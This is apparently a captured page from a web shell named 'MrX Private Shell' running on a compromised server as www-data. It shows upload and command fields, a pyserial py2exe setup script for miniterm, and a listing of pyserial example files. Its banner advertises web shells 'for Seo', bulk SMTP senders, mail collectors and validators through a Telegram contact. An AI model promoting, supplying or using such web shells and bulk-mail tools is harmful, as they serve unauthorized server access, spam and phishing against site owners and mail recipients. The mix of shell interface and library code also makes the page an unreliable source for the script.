__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
# setup script for py2exe to create the miniterm.exe
#
# (C) 2001-2015 Chris Liechti <cliechti@gmx.net>
#
# SPDX-License-Identifier:    BSD-3-Clause

from distutils.core import setup
import sys

sys.path.insert(0, '..')

import serial.tools.miniterm


sys.argv.extend("py2exe --bundle 1".split())

setup(
    name='miniterm',
    zipfile=None,
    options={"py2exe": {
        'dll_excludes': [],
        'includes': [
                'serial.urlhandler.protocol_hwgrep', 'serial.urlhandler.protocol_rfc2217',
                'serial.urlhandler.protocol_socket', 'serial.urlhandler.protocol_loop'],
        'dist_dir': 'bin',
        'excludes': ['serialjava', 'serialposix', 'serialcli'],
        'compressed': 1,
        }
    },
    console=[
        serial.tools.miniterm.__file__
    ],
)

Filemanager

Name Type Size Permission Actions
at_protocol.py File 4.82 KB 0644
port_publisher.py File 19.68 KB 0755
port_publisher.sh File 1.03 KB 0755
rfc2217_server.py File 6 KB 0755
setup-miniterm-py2exe.py File 794 B 0644
setup-rfc2217_server-py2exe.py File 780 B 0644
setup-wxTerminal-py2exe.py File 1 KB 0644
tcp_serial_redirect.py File 7.33 KB 0755
wxSerialConfigDialog.py File 12.89 KB 0755
wxSerialConfigDialog.wxg File 13.29 KB 0644
wxTerminal.py File 14.18 KB 0755
wxTerminal.wxg File 6.74 KB 0644
Filemanager